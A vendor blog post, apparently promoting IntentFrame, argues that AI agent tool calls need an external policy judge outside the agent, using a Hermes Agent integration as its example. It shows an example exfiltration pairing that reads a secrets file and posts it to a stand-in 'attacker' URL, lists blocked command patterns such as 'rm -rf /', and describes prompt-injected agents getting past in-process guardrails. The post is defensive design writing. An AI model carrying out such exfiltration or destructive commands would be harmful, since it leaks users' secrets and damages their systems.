← Back to blog

AI Agent Security Requires a Judge Outside the Agent

Prompt guardrails and in-process allowlists fail when the model is wrong or hijacked. AI agent security needs an external judge that authorizes actions before they run.

Abstract blue network — AI agent security and trust boundaries

Most teams building with AI agents start in the same place: system prompts, tool allowlists, human-in-the-loop approval for dangerous commands. That works until it doesn't — and when it fails, it fails silently.

The model doesn't need to "break out" of anything. It just needs to be wrong, tricked, or over-eager while holding tools that can run shell commands, write files, or schedule cron jobs. At that moment, the question isn't whether your prompt was good. It's whether anything outside the agent can stop the action before it runs.

That's the core of AI agent security: not better instructions, but structural separation between proposal and execution.

The trust boundary problem

An agent "turns thought into effect" the moment it executes a tool. Every consequential tool call crosses a trust boundary:

User intent → Model reasoning → Tool call → Side effect on host/network/data

Most agent stacks treat security as a layer inside that pipeline:

  • Prompt rules ("never run sudo")
  • Config allowlists
  • Optional human approval UI
  • Container isolation

These controls share a fatal assumption: the agent process remains trustworthy. But the agent process is exactly what you're trying to constrain. It hosts the model, parses tool calls, and dispatches handlers. When the model is manipulated via prompt injection, confused by ambiguous instructions, or operating autonomously on a schedule, you're asking the same runtime that wanted the action to also veto it.

ApproachWhere rules liveFailure mode
Prompt-onlyModel contextNo enforcement at execution
In-process allowlistsAgent configSame process can be bypassed or misconfigured
Human approvalOperator UIDoesn't scale; often skipped under load
External policy runtimeSeparate processAgent proposes; judge authorizes independently

AI agent security that holds up in production needs the last row: an external judge.

Structural separation: propose, judge, execute

IntentFrame implements this pattern as validate-only governance:

You → Agent proposes an action → External policy runtime checks your rules
                                      ├─ ALLOW → action runs
                                      └─ BLOCK → logged, never runs

Three properties matter:

  1. Outside the agent. Policy evaluation runs in a separate backend, not inside the agent's tool handler.
  2. Before execution. Validation happens on the proposed action payload — before shell commands run, before files are written.
  3. Fail closed. If validation fails, errors, or times out ambiguously, the action does not proceed.

This is the same architectural instinct behind OAuth, API gateways, and service meshes: authorization is not a feature of the caller; it's a gate the caller must pass through.

Padlock on a laptop — runtime authorization before agent actions run

Why in-process guardrails aren't enough

Take Hermes Agent as a concrete example. Hermes ships serious safety features: command approval, allowlists, container isolation. Those run inside the Hermes stack.

IntentFrame doesn't replace Hermes. It adds an external checkpoint for the tools that can actually touch your machine:

Hermes aloneHermes + IntentFrame
Where rules livePrompts, config, allowlists inside HermesPolicy YAML outside the agent
Who validates risky toolsThe Hermes runtimeIntentFrame, before the action runs
If the model is trickedSame process that wanted to actExternal judge blocks + audit trail

The integration governs Hermes's highest-risk tools by default: terminal, execute_code, write_file, patch, and cronjob. Reads like read_file stay ungoverned in v1 — a deliberate tradeoff, with an important caveat below.

Two layers per governed tool

Gating only the executor isn't enough. A serious AI agent security gate touches two surfaces:

LayerWhat it isWhat the gate does
SchemaTool spec shown to the modelRequires a reason field so the model explains intent
ExecutorFunction that runs the toolCalls external validator; runs original handler only on ALLOW

Patching only the executor means the model never supplies structured intent. Patching only the schema means you ask for reasons but never enforce them. You need both, every time.

The Hermes integration implements this as a plugin that wraps governed tool handlers: validate via a local adapter → strip reason → delegate to the untouched original handler on ALLOW.

Govern the privileged path, not everything

Blanket tool gating creates friction without proportional risk reduction. The right axis is:

"Changes state OR communicates externally."

GovernLeave in-process (usually)
Shell / code executionParsing, formatting, math
File writes, deletesInternal read-only helpers
Cron / scheduled autonomyRetrieval whose output stays in context
Outbound messaging, webhooks

Watch the exfiltration pairing:

read_file("secrets")  →  http_post("https://attacker/?data=...")

Neither call is a "write," but together they leak. AI agent security must govern outbound channels even when they aren't local mutations.

Select by tool name, not toolset. Hermes's file toolset mixes read_file (read) and write_file (write). Toolset-level filters are too coarse.

Deterministic + semantic enforcement

External authorization isn't one check. IntentFrame runs a pipeline:

  1. Deterministic constraints — path allowlists, blocked command patterns (sudo, rm -rf /), capability denylists
  2. Semantic review — Guardian evaluates whether the stated reason matches the actual operation, especially for ambiguous or high-impact actions

Deterministic rules catch obvious violations in milliseconds. Semantic review catches scope mismatches — like a user asking to "add a comment" to .bashrc when the patch would overwrite a privileged shell config file.

Both layers produce audit logs independent of the agent's own logging.

Circuit board close-up — layered enforcement in the policy runtime

What this means for your stack

If you're evaluating AI agent security tooling, ask four questions:

  1. Does authorization run outside the agent process?
  2. Does it run before side effects, not after?
  3. Can policy change without redeploying the agent?
  4. Is there an audit trail an operator can trust more than the model's explanation?

Prompt engineering, RBAC on API keys, and sandboxing each solve adjacent problems. None replaces runtime authorization by an external judge.

IntentFrame's Hermes integration is the first shipped example of this pattern: a plugin gate, adapter sidecar, policy backend, and operator control plane — all outside Hermes's own process boundary.

Related: Deploy AI agent governance on Hermes · Runtime authorization incident teardown · Deployment options


Image credits

Photos from Unsplash (license):

Frequently asked questions

Why isn't prompt engineering enough for AI agent security?
Prompts only influence what the model tries to do. They do not enforce anything at execution time. A confused, jailbroken, or prompt-injected model can still call tools. Security requires a separate authorization step that runs before side effects occur.
What is structural separation in AI agent security?
Structural separation means the component that decides whether an action is allowed runs outside the agent process. The agent proposes actions; an external policy runtime judges them. If the model and the enforcement logic share the same process, a compromised agent can bypass its own guardrails.
What should AI agent security govern first?
Start with the privileged path: shell execution, file writes, code execution, scheduled autonomous work, and outbound channels. Low-risk reads can stay in-process, but ungoverned outbound tools paired with reads enable exfiltration.

Ready to put a boundary around your agent's actions?

See how IntentFrame checks every action against hard limits and plain-English policy before it runs. Related GitHub repos you might want to check: IntentFrame core · Hermes agent integration